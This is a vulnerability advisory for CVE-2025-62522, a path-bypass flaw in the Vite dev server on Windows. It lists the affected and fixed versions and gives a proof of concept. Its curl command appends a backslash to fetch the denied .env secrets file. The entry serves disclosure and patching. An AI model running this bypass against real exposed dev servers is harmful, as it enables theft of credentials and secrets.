Vulnerability Database
296,748
Total vulnerabilities in the database
CVE-2025-62522
Summary
Files denied by server.fs.deny were sent if the URL ended with \ when the dev server is running on Windows.
Impact
Only apps that match the following conditions are affected:
- explicitly exposes the Vite dev server to the network (using --host or
server.hostconfig option) - running the dev server on Windows
Details
server.fs.deny can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass by using a back slash(\). The root cause is that fs.readFile('/foo.png/') loads /foo.png.
PoC
npm create vite@latest
cd vite-project/
cat "secret" > .env
npm install
npm run dev
curl --request-target /.env\ http://localhost:5173
<img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" />
| Software | From | Fixed in |
|---|---|---|
vitejs / vite
|
7.1.0 | 7.1.11 |
|
vitejs / vite
|
7.0.0 | 7.0.8 |
|
vitejs / vite
|
6.0.0 | 6.4.1 |
|
vitejs / vite
|
2.9.18 | 5.4.21 |
|
vitejs / vite
|
3.2.9 | 5.4.21 |
|
vitejs / vite
|
4.5.3 | 5.4.21 |
|
vitejs / vite
|
5.2.6 | 5.4.21 |
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime